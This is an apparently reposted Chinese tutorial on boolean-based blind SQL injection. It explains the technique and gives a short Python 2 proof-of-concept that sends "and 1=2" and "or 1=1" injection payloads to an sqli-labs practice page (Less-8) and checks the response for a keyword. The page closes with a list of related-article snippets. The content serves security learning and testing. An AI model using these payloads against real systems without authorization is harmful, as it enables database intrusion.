2. 程式人生 > >滲透測試之POC基於布林的sql盲注

滲透測試之POC基於布林的sql盲注

阿新 發佈:2019-02-05

基於布林的盲注一般只能告訴我們true or fasle。

就比如你只能向系統提問,但是系統只能回答你是或者不是。

一般套路是先問資料庫名字有多長,1,2,3,4直到回答出是,然後獲取到資料庫名字長度,然後資料庫第一個字元是不是a,b,c,d....直到回答是,獲取第一個字元,然後按照這個套路獲取到第二個第三個字元最後獲取到資料庫名稱,然後再問表,欄位。。

還有另一個套路直接字典的,不過這個對字典的要求就高了。

轉過來說說我們的poc

先看看我們的測試環境:


當id存在時就會顯示 you are in.....  當id不存在時就會顯示為空

那麼這個時候可以用 or 1=1     and 1=2的方式去驗證

id 為任意,or 1=1 則會顯示全部


id為任意,and 1=1 則會顯示為空


所以可以通過判斷關鍵字  you are in 是否存在 從而判斷是否存在sql注入

下面開始用python寫無框架的poc

#coding:utf-8
import requests
import sys
import re

def verify(url):
    target = url + "/Less-8/"
    playload1 = target + "?id=1' and 1=2 %23"
    playload2 = target + "?id=1' or 1=1 %23"
    try:
        flag1 = False
        flag2 = False
        #傳送playload1
        req1 = requests.get(playload1)
        response1 = req1.text
        #print response1
        if response1:
            #查詢關鍵字 You are in
            if not re.search('You are in',response1):
                flag1 = True
        req2 = requests.get(playload2)
        response2 = req2.text
        #print response2
        if response2:
            #查詢關鍵字 You are in
            if re.search('You are in',response2):
                flag2 = True
        print flag1,flag2
        if flag1 == flag2 and flag1 is True:
                print "%s is vulnerable" %playload2
        else:
            print "%s is not vulnerable" %playload2
    except Exception,e:
        print "Something happend...."
        print e
        
def main():
    args = sys.argv
    url = ""
    if len(args) == 2:
        url = args[1]
        #print url
        verify(url)
    else:
        print "Usage:python %s url"%(args[0])
        
if __name__ == '__main__':
    main()
測試效果



相關推薦

滲透測試POC基於布林sql

基於布林的盲注一般只能告訴我們true or fasle。 就比如你只能向系統提問,但是系統只能回答你是或者不是。 一般套路是先問資料庫名字有多長,1,2,3,4直到回答出是,然後獲取到資料庫名字長度,然後資料庫第一個字元是不是a,b,c,d....直到回答是,獲取第一個字

基於布林學習筆記

import requests import binascii MAX_DBName_len = 100 MAX_TableName_len = 100 MAX_ColumnName_len = 100 MAX_Data_len = 100 MAX_Table_Num = 100 MAX_Column_Nu

滲透測試DVWA的Medium級別的SQL注入

Medium SQL Injection Source是通過一個下拉表的方式提交資料的。選擇資料後提交,發現URL不是GET注入,是把提交的資料存放到post資料中 先把原始碼放出來 <?php if( isset( $_POST[ 'Submit' ] )

滲透測試正則過濾

lac upd 過濾 根據 target title cti 註入 insert .使用正則表達式過濾傳入的參數 正則表達式: “^(.+)\\sand\\s(.+)|(.+)\\sor(.+)\\s$” 判斷是否匹配: 檢測SQL meta-characters

Kail Linux滲透測試測試工具Armitage

tails tar sta can 啟動 sdn linux mit lin Kali Linux下的Armitage是一個很強大的滲透工具,圖形化操作頁面,但我們把kali linux裝在虛擬機裏面,然後再啟動armitage就會出現一個error,他會給你一個messa

滲透測試資訊收集常用網站

1、Whois 查詢  愛站工具網 https://whois.aizhan.com 站長之家 http://whois.chinaz.com VirusTotal  https://virustotal.com 2、備案資訊查詢 ICP 備案查詢網 http://www.bei

滲透測試Shodan的安裝和使用

目錄 Shodan Shodan工作原理 Shodan的使用 使用搜索過濾 Kali中安裝 Shodan Kali中Shodan的使用 Shodan Shodan 是一個搜尋引擎,但它與 Google 這種搜尋網址的搜尋引擎不同,Shodan 是用來搜尋網路空間中

滲透測試資訊收集

目錄 資訊收集 主機掃描(Linux/Windows,開放的埠) web伺服器型別(Apache/Nginx/Tomcat/IIS) 資料庫型別(Mysql/Oracle/Accees/Mqlserver) 指令碼型別(php/jsp/asp) 網站後臺目錄 DNS域名資

滲透測試Homeless靶機實戰

前言 本次靶機難度中等,還是長了很多見識,值得學習 環境準備 下載Homeless靶機:https://download.vulnhub.com/homeless/Homeless.zip 這裡我用 virtual box 開啟 主機:kali linux 192.168.1

SQL基於時間的(BUGKUCTF)

這篇只是為了讓我自己做個記錄 在進行一個BUGKU的ctf:http://123.206.87.240:8002/web15/ 題目給出了原始碼: error_reporting(0); function getIp(){ $ip = ''; if(isset($_SERVER['

網路安全、Web安全、滲透測試筆經面經總結(二)

轉載地址:https://www.cnblogs.com/christychang/p/6593163.html   這篇文章涉及的知識點有如下幾方面: 1.SSL Strip(SSp)攻擊到底是什麼? 2.中間人攻擊——ARP欺騙的原理、實戰及防禦 3會話劫持原理 4.CC攻擊 5.

網路安全、Web安全、滲透測試筆經面經總結(一)

轉載地址:https://www.cnblogs.com/christychang/p/6041012.html   本篇文章總結涉及以下幾個方面: 對稱加密非對稱加密? 什麼是同源策略? cookie存在哪裡?可以開啟嗎 xss如何盜取cookie? tcp、udp的區別及tcp三次

sql 利用regexp得到庫名,表名,列名

我們都已經知道,在MYSQL 5+中 information_schema庫中儲存了所有的 庫名,表明以及欄位名資訊。故攻擊方式如下: 1. 判斷第一個表名的第一個字元是否是a-z中的字元,其中blind_sqli是假設已知的庫名。 注:正則表示式中 ^[a-z] 表示字

CTF到滲透測試【淺談滲透測試資訊收集】

                     前言    從一個ctf選手到一個滲透測試工程師,第一步需要改變的就是學習資訊收集。滲透測試不是比賽,不會有提示,不會有檢視原始碼內藏提示等等,甚至你不可以使用掃描器(比如ctf中常見的AWVS),sqlmap等等。    工作中,一般進行的都是黑盒測試,你得考慮到廠

滲透測試目錄遍歷漏洞

先上一張圖看看什麼是目錄遍歷漏洞。 對,目錄遍歷就長成這樣子 一般遇到目錄遍歷漏洞,我們常做的就是去尋找有價值的東西去下載,比如資料庫 一般是沒有index.php就可能出現像這樣的一個目錄遍歷的漏洞,但是一般情況下index檔案都會有的。 那麼怎麼去找目錄遍歷漏洞,一

小白日記36:kali滲透測試Web滲透-手動漏洞挖掘(二)-突破身份認證,作業系統任意命令執行漏洞

手動漏洞挖掘 ###################################################################################### 手動漏洞挖掘

小白日記10:kali滲透測試埠掃描-UDP、TCP、殭屍掃描、隱蔽掃描

埠掃描 二三四層發現的目的只是為了準確發現所有活著主機IP,確定攻擊面,埠掃描即發現攻擊點,發現開放埠。埠對應網路服務及應用端程式,服務端程式的漏洞通過埠攻入。【所有的掃描結果,都不要完全相信】 一

如何開始你的滲透測試旅(新手必看)

                在分享滲透測試之前,簡單給大家介紹一下關於滲透測試培訓的事情,隨著市場對安全的重視,安全在我們的視

滲透測試DVWA暴力破解(LOW)

     Brute Force,即暴力(破解),是指黑客利用密碼字典,使用窮舉法猜解出使用者口令,是現在最為廣泛使用的攻擊手法之一,  先放出伺服器端核心程式碼 <?php if(isset($_GET['Login'])){ //Getusername $us

滲透測試埠掃描(二)

埠掃描:埠對應網路服務及應用端程式 服務端程式的漏洞通過埠攻入 發現開放的埠 更具體的攻擊面 UDP埠掃描: 如果收到ICMP埠不可達,表示埠關閉 如果沒有收到回包,則證明埠是